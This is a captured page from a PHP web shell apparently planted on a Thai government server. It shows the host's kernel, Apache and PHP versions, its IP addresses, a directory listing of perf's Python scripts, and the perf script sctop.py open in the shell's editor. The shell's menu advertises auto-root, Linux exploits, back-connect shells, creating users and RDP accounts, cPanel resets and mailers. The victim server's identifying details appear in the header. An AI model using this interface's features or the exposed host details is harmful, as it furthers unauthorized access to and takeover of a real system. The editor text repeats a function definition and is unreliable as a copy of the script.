Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
perf-core /
scripts /
python /
[ HOME SHELL ]
Name
Size
Permission
Action
Perf-Trace-Util
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
check-perf-trace.py
2.48
KB
-rw-r--r--
check-perf-trace.pyc
2.96
KB
-rw-r--r--
check-perf-trace.pyo
2.96
KB
-rw-r--r--
event_analyzing_sample.py
7.22
KB
-rw-r--r--
event_analyzing_sample.pyc
5.93
KB
-rw-r--r--
event_analyzing_sample.pyo
5.93
KB
-rw-r--r--
export-to-postgresql.py
15.75
KB
-rw-r--r--
export-to-postgresql.pyc
16.95
KB
-rw-r--r--
export-to-postgresql.pyo
16.95
KB
-rw-r--r--
failed-syscalls-by-pid.py
2.18
KB
-rw-r--r--
failed-syscalls-by-pid.pyc
2.97
KB
-rw-r--r--
failed-syscalls-by-pid.pyo
2.97
KB
-rw-r--r--
futex-contention.py
1.47
KB
-rw-r--r--
futex-contention.pyc
1.8
KB
-rw-r--r--
futex-contention.pyo
1.8
KB
-rw-r--r--
net_dropmonitor.py
1.71
KB
-rw-r--r--
net_dropmonitor.pyc
2.43
KB
-rw-r--r--
net_dropmonitor.pyo
2.43
KB
-rw-r--r--
netdev-times.py
14.83
KB
-rw-r--r--
netdev-times.pyc
15.46
KB
-rw-r--r--
netdev-times.pyo
15.46
KB
-rw-r--r--
sched-migration.py
11.68
KB
-rw-r--r--
sched-migration.pyc
19.45
KB
-rw-r--r--
sched-migration.pyo
19.45
KB
-rw-r--r--
sctop.py
2.05
KB
-rw-r--r--
sctop.pyc
2.62
KB
-rw-r--r--
sctop.pyo
2.62
KB
-rw-r--r--
syscall-counts-by-pid.py
2.05
KB
-rw-r--r--
syscall-counts-by-pid.pyc
2.88
KB
-rw-r--r--
syscall-counts-by-pid.pyo
2.88
KB
-rw-r--r--
syscall-counts.py
1.66
KB
-rw-r--r--
syscall-counts.pyc
2.49
KB
-rw-r--r--
syscall-counts.pyo
2.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sctop.py
# system call top # (c) 2010, Tom Zanussi <tzanussi@gmail.com> # Licensed under the terms of the GNU GPL License version 2 # # Periodically displays system-wide system call totals, broken down by # syscall. If a [comm] arg is specified, only syscalls called by # [comm] are displayed. If an [interval] arg is specified, the display # will be refreshed every [interval] seconds. The default interval is # 3 seconds. import os, sys, thread, time sys.path.append(os.environ['PERF_EXEC_PATH'] + \ '/scripts/python/Perf-Trace-Util/lib/Perf/Trace') from perf_trace_context import * from Core import * from Util import * usage = "perf script -s sctop.py [comm] [interval]\n"; for_comm = None default_interval = 3 interval = default_interval if len(sys.argv) > 3: sys.exit(usage) if len(sys.argv) > 2: for_comm = sys.argv[1] interval = int(sys.argv[2]) elif len(sys.argv) > 1: try: interval = int(sys.argv[1]) except ValueError: for_comm = sys.argv[1] interval = default_interval syscalls = autodict() def trace_begin(): thread.start_new_thread(print_syscall_totals, (interval,)) pass def syscalls__sys_enter(event_name, context, common_cpu, common_secs, common_nsecs, common_pid, common_comm, common_callchain, id, args): if for_comm is not None: if common_comm != for_comm: return try: syscalls[id] += 1 except TypeError: syscalls[id] = 1 def syscalls__sys_enter(event_name, context, common_cpu, common_secs, common_nsecs, common_pid, common_comm, id, args): raw_syscalls__sys_enter(**locals()) def print_syscall_totals(interval): while 1: clear_term() if for_comm is not None: print "\nsyscall events for %s:\n\n" % (for_comm), else: print "\nsyscall events:\n\n", print "%-40s %10s\n" % ("event", "count"), print "%-40s %10s\n" % ("----------------------------------------", \ "----------"), for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \ reverse = True): try: print "%-40s %10d\n" % (syscall_name(id), val), except TypeError: pass syscalls.clear() time.sleep(interval)
Close